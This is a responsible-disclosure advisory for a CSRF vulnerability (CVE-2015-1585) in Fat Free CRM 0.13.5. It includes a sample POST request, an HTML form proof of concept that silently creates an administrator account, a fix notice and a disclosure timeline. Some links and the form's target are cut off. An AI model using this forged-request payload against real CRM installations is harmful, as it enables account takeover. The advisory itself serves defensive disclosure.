[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5

[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5


Product Information:

Software: Fat Free CRM 

Tested Version: 0.13.5, released 22.1.2015 with over 10.000 downloads

Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)

Download link: https://rubygems.org/gems/fat_free_crm/versions/0.13.5

Description: An open source, Ruby on Rails customer relationship management 
platform (CRM). Out of the box it features group collaboration, campaign and 
lead management, contact lists, and opportunity tracking (copied from 


Vulnerability description:

When an authenticated administrative user of Fat Free CRM is creating another 
user account, the following POST request is sent to the server:

POST /admin/users HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 
Accept: */*;q=0.5, text/javascript, application/javascript, 
application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: oxZgwOAtzNdFJU85jPqmI+g893lQaOy6ctCCzef42qI=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 356
Cookie:  _session_id=$foo1; user_credentials=$foo2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


As can be seen, the application is already using a CSRF token in the parameter 
authenticity_token, that has got a sufficient entropy. Nevertheless, this 
parameter is optional and not mandatory when creating a user. When executing 
the following Proof-of-Concept, a new administrative user called "attacker" 
will be created with the password 1234. 

    <form action=""; method="POST">
      <input type="hidden" name="utf8" value="&#65533;&#156;&#147;" />
      <input type="hidden" name="user&#91;username&#93;" value="attacker" />
      <input type="hidden" name="user&#91;email&#93;" 
value="test&#64;test&#46;org" />
      <input type="hidden" name="user&#91;password&#93;" value="1234" />
      <input type="hidden" name="user&#91;password&#95;confirmation&#93;" 
value="1234" />
      <input type="hidden" name="user&#91;admin&#93;" value="1" />
      <input type="hidden" name="commit" value="Create&#32;User" />
      <input type="submit" value="Submit request" />



Every state changing operation within Fat Free CRM is using the parameter 
authenticity_token in order to prevent CSRF attacks. Nevertheless, all 
operations can be triggered by a CSRF attack, as this parameter is always 
optional and not needed. 



Update to the latest version, which is  0.13.6, see 

See also 



Vulnerability found: 11.2.2015
Vendor informed: 11.2.2015
Response by vendor: 12.2.2015
Fix by vendor 12.2.2015
Public Advisory: 14.2.2015


Best regards,

Sven Schleier